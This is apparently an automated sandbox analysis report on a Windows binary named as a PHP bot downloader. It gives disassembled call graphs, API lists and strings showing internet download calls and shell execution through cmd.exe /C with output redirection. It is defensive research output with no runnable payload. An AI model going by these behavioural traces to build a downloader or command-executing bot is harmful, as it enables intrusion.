16422 7ff658e238e9 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 16420->16422 16421->16422 16422->16251 16424 7ff658e27a4d Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 16423->16424 16425 7ff658e27ad5 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 16424->16425 16427 7ff658e33bfc 16424->16427 16425->16253 16428 7ff658e33c05 16427->16428 16430 7ff658e33c0a _invalid_parameter_noinfo 16427->16430 16429 7ff658e35e24 _set_errno_from_matherr 13 API calls 16428->16429 16429->16430 16430->16425 16432 7ff658e2bb5c std::_Lockit::_Lockit 6 API calls 16431->16432 16433 7ff658e233a5 16432->16433 16434 7ff658e257b0 __int64 7 API calls 16433->16434 16435 7ff658e233be std::locale::_Getfacet 16434->16435 16444 7ff658e233eb 16435->16444 16445 7ff658e27630 16435->16445 16436 7ff658e2bbd4 std::_Lockit::~_Lockit LeaveCriticalSection 16438 7ff658e23487 16436->16438 16438->16255 16440 7ff658e2340c 16442 7ff658e28370 Concurrency::cancel_current_task 2 API calls 16440->16442 16441 7ff658e23414 16443 7ff658e2c004 std::_Facet_Register 4 API calls 16441->16443 16442->16444 16443->16444 16444->16436 16446 7ff658e27658 16445->16446 16447 7ff658e23406 16445->16447 16446->16447 16448 7ff658e2d190 std::_Facet_Register 4 API calls 16446->16448 16447->16440 16447->16441 16449 7ff658e27674 16448->16449 16451 7ff658e242e0 65 API calls 16449->16451 16452 7ff658e2769b 16449->16452 16450 7ff658e251d0 std::_Locinfo::~_Locinfo 63 API calls 16450->16447 16451->16452 16452->16447 16452->16450 16454 7ff658e28cfe 16453->16454 16455 7ff658e28d70 std::ios_base::clear 32 API calls 16454->16455 16456 7ff658e28d2e 16455->16456 16456->16226 16459 7ff658e24afd std::ios_base::good 16457->16459 16458 7ff658e24b24 std::ios_base::good 16458->16233 16459->16458 16468 7ff658e29900 16459->16468 16476 7ff658e2b860 16461->16476 16462 7ff658e2ac2d 16462->16230 16465 7ff658e2548e 16464->16465 16466 7ff658e254c0 16465->16466 16495 7ff658e28070 16465->16495 16466->16236 16469 7ff658e29928 16468->16469 16470 7ff658e29997 16469->16470 16471 7ff658e24ae0 32 API calls 16469->16471 16470->16458 16474 7ff658e29944 16471->16474 16472 7ff658e2998c 16473 7ff658e25480 32 API calls 16472->16473 16473->16470 16474->16472 16475 7ff658e2abb0 32 API calls 16474->16475 16475->16472 16477 7ff658e2b898 std::ios_base::failure::failure 16476->16477 16478 7ff658e2b87f 16476->16478 16477->16478 16480 7ff658e34b4c 16477->16480 16478->16462 16481 7ff658e34b7b _invalid_parameter_noinfo 16480->16481 16482 7ff658e34b6c 16480->16482 16481->16478 16482->16481 16483 7ff658e34b76 16482->16483 16484 7ff658e34b8e 16482->16484 16486 7ff658e35e24 _set_errno_from_matherr 13 API calls 16483->16486 16487 7ff658e348fc 16484->16487 16486->16481 16494 7ff658e33c44 EnterCriticalSection 16487->16494 16489 7ff658e34919 16490 7ff658e3493c Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 59 API calls 16489->16490 16491 7ff658e34922 16490->16491 16492 7ff658e33c50 _Fputc LeaveCriticalSection 16491->16492 16493 7ff658e3492d 16492->16493 16493->16481 16497 7ff658e28098 std::ios_base::good 16495->16497 16496 7ff658e28137 16496->16466 16497->16496 16498 7ff658e2abb0 32 API calls 16497->16498 16498->16496 16500 7ff658e28e78 16499->16500 16501 7ff658e28ead 16499->16501 16507 7ff658e27340 16500->16507 16504 7ff658e27a30 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 13 API calls 16501->16504 16505 7ff658e28ed7 16504->16505 16505->16240 16505->16241 16510 7ff658e2736d codecvt char_traits 16507->16510 16511 7ff658e2737d 16507->16511 16508 7ff658e2d840 _handle_error 8 API calls 16509 7ff658e274dc 16508->16509 16513 7ff658e33ce0 16509->16513 16510->16511 16512 7ff658e34b4c Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 61 API calls 16510->16512 16511->16508 16512->16511 16514 7ff658e33cf7 16513->16514 16515 7ff658e33d15 16513->16515 16516 7ff658e35e24 _set_errno_from_matherr 13 API calls 16514->16516 16520 7ff658e33cfc _invalid_parameter_noinfo Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 16515->16520 16523 7ff658e33c44 EnterCriticalSection 16515->16523 16516->16520 16518 7ff658e33d2b 16519 7ff658e33c5c Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 59 API calls 16518->16519 16521 7ff658e33d34 16519->16521 16520->16501 16522 7ff658e33c50 _Fputc LeaveCriticalSection 16521->16522 16522->16520 16527 7ff658e24cf0 16524->16527 16526 7ff658e24df2 Concurrency::details::VirtualProcessorRoot::VirtualProcessorRoot 16526->16244 16528 7ff658e24d17 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 16527->16528 16529 7ff658e28e60 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 64 API calls 16528->16529 16530 7ff658e24d38 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 16528->16530 16529->16530 16530->16526 16532 7ff658e263f3 16531->16532 16533 7ff658e26432 16531->16533 16535 7ff658e2d5b4 5 API calls 16532->16535 16534 7ff658e2d840 _handle_error 8 API calls 16533->16534 16536 7ff658e26446 16534->16536 16537 7ff658e263ff 16535->16537 16536->15842 16537->16533 16538 7ff658e2d414 16 API calls 16537->16538 16539 7ff658e26425 16538->16539 16540 7ff658e2d554 4 API calls 16539->16540 16540->16533 16542 7ff658e287a8 Concurrency::details::WorkQueue::IsStructuredEmpty type_info::_name_internal_method 16541->16542 16543 7ff658e287d0 std::ios_base::failure::failure 32 API calls 16542->16543 16544 7ff658e287c2 16543->16544 16544->15891 16546 7ff658e25579 Concurrency::details::WorkQueue::IsStructuredEmpty 16545->16546 16547 7ff658e255a6 16546->16547 16555 7ff658e272a0 16546->16555 16547->15914 16550 7ff658e22785 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure _Func_class type_info::_name_internal_method 16549->16550 16551 7ff658e28690 std::ios_base::failure::failure 15 API calls 16550->16551 16552 7ff658e227c2 Concurrency::details::WorkQueue::IsStructuredEmpty 16550->16552 16551->16552 16553 7ff658e23b10 21 API calls 16552->16553 16554 7ff658e21b5d 16553->16554 16554->15920 16556 7ff658e272bd Concurrency::details::WorkQueue::IsStructuredEmpty ctype 16555->16556 16557 7ff658e28980 std::ios_base::failure::failure 32 API calls 16556->16557 16558 7ff658e272ff 16557->16558 16558->16547 16560 7ff658e3bf24 _Getctype 30 API calls 16559->16560 16561 7ff658e3b39d 16560->16561 16562 7ff658e383b8 BuildCatchObjectHelperInternal 30 API calls 16561->16562 16563 7ff658e3b3b3 16562->16563 17997 7ff658e2b560 18001 7ff658e2b582 std::ios_base::failure::failure _Min_value Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 17997->18001 18002 7ff658e2b57b 17997->18002 17998 7ff658e2b6dd 18000 7ff658e345e4 _fread_nolock 29 API calls 17998->18000 17998->18002 18000->18002 18001->17998 18001->18002 18003 7ff658e345e4 18001->18003 18006 7ff658e34604 18003->18006 18005 7ff658e345fc 18005->18001 18007 7ff658e3462e 18006->18007 18016 7ff658e34652 _invalid_parameter_noinfo 18006->18016 18008 7ff658e3467a 18007->18008 18009 7ff658e3463d __scrt_fastfail 18007->18009 18007->18016 18017 7ff658e33c44 EnterCriticalSection 18008->18017 18011 7ff658e35e24 _set_errno_from_matherr 13 API calls 18009->18011 18011->18016 18016->18005 18490 7ff658e2aa60 18491 7ff658e2aa7b 18490->18491 18492 7ff658e2aad2 18491->18492 18496 7ff658e34cf0 18491->18496 18494 7ff658e2aace 18494->18492 18495 7ff658e27a30 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 13 API calls 18494->18495 18495->18492 18497 7ff658e34d10 18496->18497 18498 7ff658e34d73 18496->18498 18497->18498 18500 7ff658e34d34 18497->18500 18499 7ff658e35e24 _set_errno_from_matherr 13 API calls 18498->18499 18502 7ff658e34d71 _invalid_parameter_noinfo 18499->18502 18503 7ff658e34bd0 18500->18503 18502->18494 18510 7ff658e33c44 EnterCriticalSection 18503->18510 18511 7ff658e28660 18512 7ff658e28678 18511->18512 18513 7ff658e28689 18511->18513 18515 7ff658e33c50 LeaveCriticalSection 18512->18515 19218 7ff658e4a34a 19221 7ff658e33c50 LeaveCriticalSection 19218->19221 18544 7ff658e2a240 18545 7ff658e2a267 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy char_traits 18544->18545 18548 7ff658e2a33a 18545->18548 18550 7ff658e2a384 codecvt 18545->18550 18555 7ff658e2a284 char_traits 18545->18555 18546 7ff658e2d840 _handle_error 8 API calls 18547 7ff658e2a4e9 18546->18547 18556 7ff658e22a00 18548->18556 18551 7ff658e2a41c 18550->18551 18552 7ff658e2a40c 18550->18552 18550->18555 18554 7ff658e34b4c Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 61 API calls 18551->18554 18551->18555 18553 7ff658e22a00 _Fputc 62 API calls 18552->18553 18552->18555 18553->18555 18554->18555 18555->18546 18559 7ff658e34230 18556->18559 18558 7ff658e22a1e 18558->18555 18560 7ff658e3426c 18559->18560 18561 7ff658e3424e 18559->18561 18576 7ff658e33c44 EnterCriticalSection 18560->18576 18562 7ff658e35e24 _set_errno_from_matherr 13 API calls 18561->18562 18568 7ff658e34253 _invalid_parameter_noinfo 18562->18568 18568->18558

                                                Executed Functions

                                                Function 00007FF658E22270 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71networkfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Internet$CloseHandleOpenProcessorVirtual$Concurrency::FileReadRootRoot::
                                                • String ID: Downloader
                                                • API String ID: 468320751-2223799613
                                                • Opcode ID: bf0e7b194c67c6f95d9e5dac6448b552355a720301ad6c01c86269b4cab85926
                                                • Instruction ID: fbb108deb139b4c0794a8be0a6be355a06729750435ee60801dff03251e27b7c
                                                • Opcode Fuzzy Hash: bf0e7b194c67c6f95d9e5dac6448b552355a720301ad6c01c86269b4cab85926
                                                • Instruction Fuzzy Hash: 87313E31618A9682E7609B20F8557AFA770FBC4784F441035EA8E97EA4DF7DD444CB08
                                                Function 00007FF658E21AB0 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 132synchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: CloseCodeConcurrency::details::EmptyExecuteExitHandleObjectProcessQueue::ShellSingleStructuredWaitWorktype_info::_name_internal_method
                                                • String ID: 2>&1$ > $/C $/C $@$cmd.exe$p
                                                • API String ID: 677652370-1402895998
                                                • Opcode ID: ecd0709a960a5d5daa54d7dab036d8559c6efa0a97d991f069f00276a01038b8
                                                • Instruction ID: 3def470a8272c08678ea9f1dd8031ae67251f18ebbdf1c42a9e6581ec05cb3f3
                                                • Opcode Fuzzy Hash: ecd0709a960a5d5daa54d7dab036d8559c6efa0a97d991f069f00276a01038b8
                                                • Instruction Fuzzy Hash: 7B71083260CAD691E621DB24E8503EFA3B1FBC4784F444132D68E97AA9DF7CE544CB44
                                                Function 00007FF658E210B0 Relevance: 19.9, APIs: 13, Instructions: 403COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 53 7ff658e210b0-7ff658e21236 call 7ff658e26240 call 7ff658e25750 call 7ff658e23a20 call 7ff658e25c70 call 7ff658e25750 call 7ff658e23a20 call 7ff658e25860 call 7ff658e25750 call 7ff658e23a20 call 7ff658e26040 call 7ff658e25750 call 7ff658e23a20 call 7ff658e264b0 call 7ff658e25750 call 7ff658e23a20 call 7ff658e26710 call 7ff658e25750 call 7ff658e23a20 call 7ff658e21db0 call 7ff658e224b0 94 7ff658e21238-7ff658e2129f call 7ff658e24ec0 * 7 53->94 95 7ff658e212a4-7ff658e213d5 call 7ff658e265f0 call 7ff658e25730 call 7ff658e23a20 call 7ff658e26180 call 7ff658e256d0 call 7ff658e23a20 call 7ff658e225a0 call 7ff658e22690 call 7ff658e224e0 call 7ff658e24ec0 call 7ff658e22690 call 7ff658e224e0 call 7ff658e24ec0 call 7ff658e239a0 call 7ff658e21ea0 53->95 125 7ff658e2192e-7ff658e21946 call 7ff658e2d840 94->125 143 7ff658e21488-7ff658e214f6 call 7ff658e25a10 call 7ff658e25770 call 7ff658e28c40 call 7ff658e22270 call 7ff658e239a0 call 7ff658e21ea0 95->143 144 7ff658e213db-7ff658e21483 call 7ff658e24ec0 * 12 95->144 170 7ff658e215a9-7ff658e21840 call 7ff658e239a0 * 2 call 7ff658e21f30 call 7ff658e25db0 call 7ff658e256f0 call 7ff658e23a20 call 7ff658e22690 call 7ff658e224e0 call 7ff658e22540 call 7ff658e224e0 call 7ff658e24ec0 * 3 call 7ff658e25e80 call 7ff658e25790 call 7ff658e23a20 call 7ff658e22690 call 7ff658e224e0 call 7ff658e22540 call 7ff658e224e0 call 7ff658e24ec0 * 3 call 7ff658e22690 call 7ff658e224e0 call 7ff658e24ec0 call 7ff658e23a20 call 7ff658e239a0 call 7ff658e21ab0 call 7ff658e239a0 call 7ff658e22160 143->170 171 7ff658e214fc-7ff658e215a4 call 7ff658e24ec0 * 12 143->171 144->125 268 7ff658e21845-7ff658e2192a call 7ff658e24ec0 * 17 170->268 171->125 268->125
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: shared_ptr$Concurrency::details::EmptyQueue::StructuredWorktype_info::_name_internal_method
                                                • String ID:
                                                • API String ID: 3540271106-0
                                                • Opcode ID: 660f85d507ffcc3d8142a87e9c076f7a78da7657eb6308c16db16e608eb55c71
                                                • Instruction ID: 860c26d71111dc3ef18603b0bb613b2841b51e82eedb19f3ffcc62fec878760c
                                                • Opcode Fuzzy Hash: 660f85d507ffcc3d8142a87e9c076f7a78da7657eb6308c16db16e608eb55c71
                                                • Instruction Fuzzy Hash: C512E32262C5D391EA21E760EC512FEA375FBD4344F840132D64E96EAAEF3CE644CB54
                                                Function 00007FF658E4742C Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 303 7ff658e4742c-7ff658e4749f call 7ff658e47010 306 7ff658e474b9-7ff658e474c3 call 7ff658e4387c 303->306 307 7ff658e474a1-7ff658e474aa call 7ff658e35e04 303->307 312 7ff658e474de-7ff658e47547 CreateFileW 306->312 313 7ff658e474c5-7ff658e474dc call 7ff658e35e04 call 7ff658e35e24 306->313 314 7ff658e474ad-7ff658e474b4 call 7ff658e35e24 307->314 316 7ff658e47549-7ff658e4754f 312->316 317 7ff658e475c4-7ff658e475cf GetFileType 312->317 313->314 331 7ff658e477f2-7ff658e47812 314->331 320 7ff658e47591-7ff658e475bf GetLastError call 7ff658e35db4 316->320 321 7ff658e47551-7ff658e47555 316->321 323 7ff658e475d1-7ff658e4760c GetLastError call 7ff658e35db4 CloseHandle 317->323 324 7ff658e47622-7ff658e47629 317->324 320->314 321->320 329 7ff658e47557-7ff658e4758f CreateFileW 321->329 323->314 337 7ff658e47612-7ff658e4761d call 7ff658e35e24 323->337 327 7ff658e4762b-7ff658e4762f 324->327 328 7ff658e47631-7ff658e47634 324->328 334 7ff658e4763a-7ff658e4768b call 7ff658e43794 327->334 328->334 335 7ff658e47636 328->335 329->317 329->320 342 7ff658e4768d-7ff658e47699 call 7ff658e4721c 334->342 343 7ff658e476aa-7ff658e476da call 7ff658e46d7c 334->343 335->334 337->314 342->343 350 7ff658e4769b 342->350 348 7ff658e4769d-7ff658e476a5 call 7ff658e3d118 343->348 349 7ff658e476dc-7ff658e4771f 343->349 348->331 352 7ff658e47741-7ff658e4774c 349->352 353 7ff658e47721-7ff658e47725 349->353 350->348 356 7ff658e477f0 352->356 357 7ff658e47752-7ff658e47756 352->357 353->352 355 7ff658e47727-7ff658e4773c 353->355 355->352 356->331 357->356 358 7ff658e4775c-7ff658e477a1 CloseHandle CreateFileW 357->358 359 7ff658e477d6-7ff658e477eb 358->359 360 7ff658e477a3-7ff658e477d1 GetLastError call 7ff658e35db4 call 7ff658e439bc 358->360 359->356 360->359
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                • String ID:
                                                • API String ID: 1330151763-0
                                                • Opcode ID: b051788a4b9f1cecd37e765c46742b5fa343634d29695278168d0b16224b77b6
                                                • Instruction ID: 6a38a86ea7c28ee26538641fc3c69d1df079341e811ede2445468cf6e1faf09c
                                                • Opcode Fuzzy Hash: b051788a4b9f1cecd37e765c46742b5fa343634d29695278168d0b16224b77b6
                                                • Instruction Fuzzy Hash: 5FC1D237B24A6585EB10CF79C4906AC3771F788B98B140225DE6EA7BE4DF38E452C344
                                                Function 00007FF658E2D974 Relevance: 10.6, APIs: 7, Instructions: 94COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: __scrt_fastfail$__scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 2735655165-0
                                                • Opcode ID: 4838486631ff523eeef2ecb4245ae7cd1383d3c604e78f70fc5114c1b9c52c62
                                                • Instruction ID: 09db3cb2f9db44d862be8b6e36f616d9374bbedc722765d2d196c91ce7ee65b9
                                                • Opcode Fuzzy Hash: 4838486631ff523eeef2ecb4245ae7cd1383d3c604e78f70fc5114c1b9c52c62
                                                • Instruction Fuzzy Hash: 5F313961F0C27B85FA54A77598127B912B1AF81344F4C4434EA4FEBAE7CE7DE8058208
                                                Function 00007FF658E3DDCC Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 446 7ff658e3ddcc-7ff658e3ddef 447 7ff658e3e08c 446->447 448 7ff658e3ddf5-7ff658e3ddf8 446->448 451 7ff658e3e08e-7ff658e3e0a5 447->451 449 7ff658e3de1a-7ff658e3de40 448->449 450 7ff658e3ddfa-7ff658e3de15 call 7ff658e35e04 call 7ff658e35e24 call 7ff658e335fc 448->450 452 7ff658e3de4b-7ff658e3de51 449->452 453 7ff658e3de42-7ff658e3de49 449->453 450->451 456 7ff658e3de61-7ff658e3de71 call 7ff658e46548 452->456 457 7ff658e3de53-7ff658e3de5c call 7ff658e3f620 452->457 453->450 453->452 464 7ff658e3de77-7ff658e3de87 456->464 465 7ff658e3df7a-7ff658e3df8a 456->465 457->456 464->465 469 7ff658e3de8d-7ff658e3dea0 call 7ff658e3bf24 464->469 467 7ff658e3df8c-7ff658e3df93 465->467 468 7ff658e3dfdb-7ff658e3e000 WriteFile 465->468 472 7ff658e3dfc7-7ff658e3dfd9 call 7ff658e3d950 467->472 473 7ff658e3df95-7ff658e3df98 467->473 470 7ff658e3e00b 468->470 471 7ff658e3e002-7ff658e3e008 GetLastError 468->471 480 7ff658e3deb8-7ff658e3ded4 GetConsoleMode 469->480 481 7ff658e3dea2-7ff658e3deb2 469->481 477 7ff658e3e00e 470->477 471->470 488 7ff658e3df6e-7ff658e3df75 472->488 478 7ff658e3df9a-7ff658e3df9d 473->478 479 7ff658e3dfb3-7ff658e3dfc5 call 7ff658e3db70 473->479 483 7ff658e3e013 477->483 484 7ff658e3e018-7ff658e3e022 478->484 485 7ff658e3df9f-7ff658e3dfb1 call 7ff658e3da54 478->485 479->488 480->465 487 7ff658e3deda-7ff658e3dedd 480->487 481->465 481->480 483->484 489 7ff658e3e085-7ff658e3e08a 484->489 490 7ff658e3e024-7ff658e3e029 484->490 485->488 493 7ff658e3df5c-7ff658e3df69 call 7ff658e3d480 487->493 494 7ff658e3dedf-7ff658e3dee6 487->494 488->483 489->451 495 7ff658e3e02b-7ff658e3e02e 490->495 496 7ff658e3e055-7ff658e3e066 490->496 493->488 494->484 499 7ff658e3deec-7ff658e3defc 494->499 502 7ff658e3e04b-7ff658e3e050 call 7ff658e35db4 495->502 503 7ff658e3e030-7ff658e3e040 call 7ff658e35e24 call 7ff658e35e04 495->503 500 7ff658e3e068-7ff658e3e06b 496->500 501 7ff658e3e06d-7ff658e3e07d call 7ff658e35e24 call 7ff658e35e04 496->501 505 7ff658e3defe 499->505 506 7ff658e3df55-7ff658e3df57 499->506 500->447 500->501 501->489 502->496 503->502 510 7ff658e3df01-7ff658e3df18 call 7ff658e4675c 505->510 506->477 519 7ff658e3df4c-7ff658e3df52 GetLastError 510->519 520 7ff658e3df1a-7ff658e3df24 510->520 519->506 521 7ff658e3df26-7ff658e3df38 call 7ff658e4675c 520->521 522 7ff658e3df41-7ff658e3df48 520->522 521->519 526 7ff658e3df3a-7ff658e3df3f 521->526 522->506 523 7ff658e3df4a 522->523 523->510 526->522
                                                APIs
                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF658E3DE0D
                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF658E3DD8B,?,?,FFFFFFFE,00007FF658E3E7C2), ref: 00007FF658E3DECC
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF658E3DD8B,?,?,FFFFFFFE,00007FF658E3E7C2), ref: 00007FF658E3DF4C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 8225f0bb8bc109e91bb0b0dc42c1d2d10c0c76c435bde0e5dc91867a131cd7c0
                                                • Instruction ID: fae7ef0155aab66df489c589bc885ae57745d93ecda3cb7c0f6a8d8ac9876d3d
                                                • Opcode Fuzzy Hash: 8225f0bb8bc109e91bb0b0dc42c1d2d10c0c76c435bde0e5dc91867a131cd7c0
                                                • Instruction Fuzzy Hash: 2B81B022F1862285FB519B7198802BC66B0BB44B94F480135DA4EE7FA5DF3CBC45C718
                                                Function 00007FF658E38AD0 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 0cf961d5a59d52704767c47960e182a4548ebef7e2a4c77c03120b1d081cdc36
                                                • Instruction ID: 04d24e899b261131ac6002edb87a3cef2e7e18b5f364ed9b615654c22b3a6653
                                                • Opcode Fuzzy Hash: 0cf961d5a59d52704767c47960e182a4548ebef7e2a4c77c03120b1d081cdc36
                                                • Instruction Fuzzy Hash: C5E0BF64B0473A82FB546B719C962792276AFC5741F185438C84F97B72CE3EFC498209
                                                Function 00007FF658E21F30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • shared_ptr.LIBCMTD ref: 00007FF658E21F72
                                                  • Part of subcall function 00007FF658E22690: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E226FD
                                                  • Part of subcall function 00007FF658E24EC0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E24EDB
